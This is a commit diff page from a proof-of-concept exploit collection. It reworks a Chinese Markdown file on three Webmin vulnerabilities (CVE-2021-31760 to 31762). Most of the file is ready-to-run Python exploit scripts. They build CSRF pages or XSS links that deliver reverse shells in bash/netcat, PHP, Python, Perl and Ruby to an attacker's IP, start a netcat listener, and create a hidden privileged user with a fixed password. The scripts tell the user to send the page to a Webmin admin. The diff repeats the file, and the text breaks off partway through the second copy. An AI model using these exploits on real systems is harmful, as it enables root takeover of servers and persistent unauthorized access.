admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 02:37:58 +00:00
Code Issues Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
Threekiii 2025-08-18 10:40:54 +08:00
parent 5502415f0f
commit 11803fdc55
13 changed files with 559 additions and 542 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
README.md
View File

@ -656,7 +656,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* GoAhead Server 远程命令执行漏洞 CVE-2017-17562
* GoCD plugin 任意文件读取漏洞 CVE-2021-43287
* JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
* JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149
* JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149
* JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501
* Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861
* Jenkins CLI 接口任意文件读取漏洞 CVE-2024-23897
@ -793,6 +793,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980
* Apache Commons Text 远程代码执行漏洞 CVE-2022-42889
* Apache CXF Aegis DataBinding 服务端请求伪造漏洞 CVE-2024-28752
* Apache Dubbo Hessian 反序列化漏洞 CVE-2020-1948
* Apache Dubbo Java反序列化漏洞 CVE-2019-17564
* Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518

972
Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md
View File

@ -1,486 +1,486 @@
# Webmin 多个高危漏洞 CVE-2021-31760~62
## 漏洞描述
CVE-2021-31760:利用CSRF攻击实现对Webmin的远程命令执行。
CVE-2021-31761:利用XSS攻击实现对Webmin的远程命令执行。
CVE-2021-31762:利用CSRF攻击通过Webmin的添加用户功能创建特权用户然后通过特权用户权限反弹shell。
参考链接:
- CVE-2021-31760https://github.com/electronicbots/CVE-2021-31760
- CVE-2021-31761https://github.com/electronicbots/CVE-2021-31761
- CVE-2021-31762https://github.com/electronicbots/CVE-2021-31762
## 漏洞影响
```
Webmin <= 1.973
```
## 网络测绘
```
app="Webmin"
```
## 漏洞复现
CVE-2021-31760 poc
```python
import time, subprocess,random
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'proc/run.cgi'
else:
target = target + '/proc/run.cgi'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="''' + target +'''" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31761 poc
```python
import time, subprocess,random,urllib.parse
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'tunnel/link.cgi/'
else:
target = target + '/tunnel/link.cgi/'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
Payload = urllib.parse.quote('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
print(target+Payload)
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31762 poc
```python
import time
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'acl/save_user.cgi'
else:
target = target + '/acl/save_user.cgi'
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="'''+target+'''" method="POST">
<input type="hidden" name="safe" value="" />
<input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="pass&#95;def" value="0" />
<input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
<input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="cert&#95;def" value="1" />
<input type="hidden" name="lang&#95;def" value="1" />
<input type="hidden" name="lang" value="af" />
<input type="hidden" name="notabs" value="0" />
<input type="hidden" name="theme&#95;def" value="1" />
<input type="hidden" name="theme" value="" />
<input type="hidden" name="overlay&#95;def" value="1" />
<input type="hidden" name="overlay" value="overlay&#45;theme" />
<input type="hidden" name="logouttime&#95;def" value="1" />
<input type="hidden" name="minsize&#95;def" value="1" />
<input type="hidden" name="ipmode" value="0" />
<input type="hidden" name="ips" value="" />
<input type="hidden" name="days&#95;def" value="1" />
<input type="hidden" name="hours&#95;def" value="1" />
<input type="hidden" name="hours&#95;hfrom" value="" />
<input type="hidden" name="hours&#95;mfrom" value="" />
<input type="hidden" name="hours&#95;hto" value="" />
<input type="hidden" name="hours&#95;mto" value="" />
<input type="hidden" name="mod" value="backup&#45;config" />
<input type="hidden" name="mod" value="change&#45;user" />
<input type="hidden" name="mod" value="webmincron" />
<input type="hidden" name="mod" value="usermin" />
<input type="hidden" name="mod" value="webminlog" />
<input type="hidden" name="mod" value="webmin" />
<input type="hidden" name="mod" value="help" />
<input type="hidden" name="mod" value="servers" />
<input type="hidden" name="mod" value="acl" />
<input type="hidden" name="mod" value="bacula&#45;backup" />
<input type="hidden" name="mod" value="init" />
<input type="hidden" name="mod" value="passwd" />
<input type="hidden" name="mod" value="quota" />
<input type="hidden" name="mod" value="mount" />
<input type="hidden" name="mod" value="fsdump" />
<input type="hidden" name="mod" value="ldap&#45;client" />
<input type="hidden" name="mod" value="ldap&#45;useradmin" />
<input type="hidden" name="mod" value="logrotate" />
<input type="hidden" name="mod" value="mailcap" />
<input type="hidden" name="mod" value="mon" />
<input type="hidden" name="mod" value="pam" />
<input type="hidden" name="mod" value="certmgr" />
<input type="hidden" name="mod" value="proc" />
<input type="hidden" name="mod" value="at" />
<input type="hidden" name="mod" value="cron" />
<input type="hidden" name="mod" value="sentry" />
<input type="hidden" name="mod" value="man" />
<input type="hidden" name="mod" value="syslog" />
<input type="hidden" name="mod" value="syslog&#45;ng" />
<input type="hidden" name="mod" value="system&#45;status" />
<input type="hidden" name="mod" value="useradmin" />
<input type="hidden" name="mod" value="apache" />
<input type="hidden" name="mod" value="bind8" />
<input type="hidden" name="mod" value="pserver" />
<input type="hidden" name="mod" value="dhcpd" />
<input type="hidden" name="mod" value="dhcp&#45;dns" />
<input type="hidden" name="mod" value="dovecot" />
<input type="hidden" name="mod" value="exim" />
<input type="hidden" name="mod" value="fetchmail" />
<input type="hidden" name="mod" value="foobar" />
<input type="hidden" name="mod" value="frox" />
<input type="hidden" name="mod" value="jabber" />
<input type="hidden" name="mod" value="ldap&#45;server" />
<input type="hidden" name="mod" value="majordomo" />
<input type="hidden" name="mod" value="htpasswd&#45;file" />
<input type="hidden" name="mod" value="minecraft" />
<input type="hidden" name="mod" value="mysql" />
<input type="hidden" name="mod" value="openslp" />
<input type="hidden" name="mod" value="postfix" />
<input type="hidden" name="mod" value="postgresql" />
<input type="hidden" name="mod" value="proftpd" />
<input type="hidden" name="mod" value="procmail" />
<input type="hidden" name="mod" value="qmailadmin" />
<input type="hidden" name="mod" value="mailboxes" />
<input type="hidden" name="mod" value="sshd" />
<input type="hidden" name="mod" value="samba" />
<input type="hidden" name="mod" value="sendmail" />
<input type="hidden" name="mod" value="spam" />
<input type="hidden" name="mod" value="squid" />
<input type="hidden" name="mod" value="sarg" />
<input type="hidden" name="mod" value="wuftpd" />
<input type="hidden" name="mod" value="webalizer" />
<input type="hidden" name="mod" value="link" />
<input type="hidden" name="mod" value="adsl&#45;client" />
<input type="hidden" name="mod" value="bandwidth" />
<input type="hidden" name="mod" value="fail2ban" />
<input type="hidden" name="mod" value="firewalld" />
<input type="hidden" name="mod" value="ipsec" />
<input type="hidden" name="mod" value="krb5" />
<input type="hidden" name="mod" value="firewall" />
<input type="hidden" name="mod" value="firewall6" />
<input type="hidden" name="mod" value="exports" />
<input type="hidden" name="mod" value="exports&#45;nfs4" />
<input type="hidden" name="mod" value="xinetd" />
<input type="hidden" name="mod" value="inetd" />
<input type="hidden" name="mod" value="pap" />
<input type="hidden" name="mod" value="ppp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;server" />
<input type="hidden" name="mod" value="stunnel" />
<input type="hidden" name="mod" value="shorewall" />
<input type="hidden" name="mod" value="shorewall6" />
<input type="hidden" name="mod" value="itsecur&#45;firewall" />
<input type="hidden" name="mod" value="tcpwrappers" />
<input type="hidden" name="mod" value="idmapd" />
<input type="hidden" name="mod" value="filter" />
<input type="hidden" name="mod" value="burner" />
<input type="hidden" name="mod" value="grub" />
<input type="hidden" name="mod" value="lilo" />
<input type="hidden" name="mod" value="raid" />
<input type="hidden" name="mod" value="lvm" />
<input type="hidden" name="mod" value="fdisk" />
<input type="hidden" name="mod" value="lpadmin" />
<input type="hidden" name="mod" value="smart&#45;status" />
<input type="hidden" name="mod" value="time" />
<input type="hidden" name="mod" value="vgetty" />
<input type="hidden" name="mod" value="iscsi&#45;client" />
<input type="hidden" name="mod" value="iscsi&#45;server" />
<input type="hidden" name="mod" value="iscsi&#45;tgtd" />
<input type="hidden" name="mod" value="iscsi&#45;target" />
<input type="hidden" name="mod" value="cluster&#45;passwd" />
<input type="hidden" name="mod" value="cluster&#45;copy" />
<input type="hidden" name="mod" value="cluster&#45;cron" />
<input type="hidden" name="mod" value="cluster&#45;shell" />
<input type="hidden" name="mod" value="cluster&#45;shutdown" />
<input type="hidden" name="mod" value="cluster&#45;usermin" />
<input type="hidden" name="mod" value="cluster&#45;useradmin" />
<input type="hidden" name="mod" value="cluster&#45;webmin" />
<input type="hidden" name="mod" value="cfengine" />
<input type="hidden" name="mod" value="heartbeat" />
<input type="hidden" name="mod" value="shell" />
<input type="hidden" name="mod" value="custom" />
<input type="hidden" name="mod" value="disk&#45;usage" />
<input type="hidden" name="mod" value="export&#45;test" />
<input type="hidden" name="mod" value="ftelnet" />
<input type="hidden" name="mod" value="filemin" />
<input type="hidden" name="mod" value="flashterm" />
<input type="hidden" name="mod" value="tunnel" />
<input type="hidden" name="mod" value="file" />
<input type="hidden" name="mod" value="phpini" />
<input type="hidden" name="mod" value="cpan" />
<input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
<input type="hidden" name="mod" value="telnet" />
<input type="hidden" name="mod" value="ssh" />
<input type="hidden" name="mod" value="ssh2" />
<input type="hidden" name="mod" value="shellinabox" />
<input type="hidden" name="mod" value="status" />
<input type="hidden" name="mod" value="ajaxterm" />
<input type="hidden" name="mod" value="updown" />
<input type="hidden" name="mod" value="vnc" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
def main():
CSRF_Generator()
if __name__ == '__main__':
main()
```
# Webmin 多个高危漏洞 CVE-2021-31760~62
## 漏洞描述
CVE-2021-31760:利用CSRF攻击实现对Webmin的远程命令执行。
CVE-2021-31761:利用XSS攻击实现对Webmin的远程命令执行。
CVE-2021-31762:利用CSRF攻击通过Webmin的添加用户功能创建特权用户然后通过特权用户权限反弹shell。
参考链接:
- CVE-2021-31760https://github.com/electronicbots/CVE-2021-31760
- CVE-2021-31761https://github.com/electronicbots/CVE-2021-31761
- CVE-2021-31762https://github.com/electronicbots/CVE-2021-31762
## 漏洞影响
```
Webmin <= 1.973
```
## 网络测绘
```
app="Webmin"
```
## 漏洞复现
CVE-2021-31760 poc
```python
import time, subprocess,random
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'proc/run.cgi'
else:
target = target + '/proc/run.cgi'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="''' + target +'''" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31761 poc
```python
import time, subprocess,random,urllib.parse
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'tunnel/link.cgi/'
else:
target = target + '/tunnel/link.cgi/'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
Payload = urllib.parse.quote('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
print(target+Payload)
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31762 poc
```python
import time
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'acl/save_user.cgi'
else:
target = target + '/acl/save_user.cgi'
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="'''+target+'''" method="POST">
<input type="hidden" name="safe" value="" />
<input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="pass&#95;def" value="0" />
<input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
<input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="cert&#95;def" value="1" />
<input type="hidden" name="lang&#95;def" value="1" />
<input type="hidden" name="lang" value="af" />
<input type="hidden" name="notabs" value="0" />
<input type="hidden" name="theme&#95;def" value="1" />
<input type="hidden" name="theme" value="" />
<input type="hidden" name="overlay&#95;def" value="1" />
<input type="hidden" name="overlay" value="overlay&#45;theme" />
<input type="hidden" name="logouttime&#95;def" value="1" />
<input type="hidden" name="minsize&#95;def" value="1" />
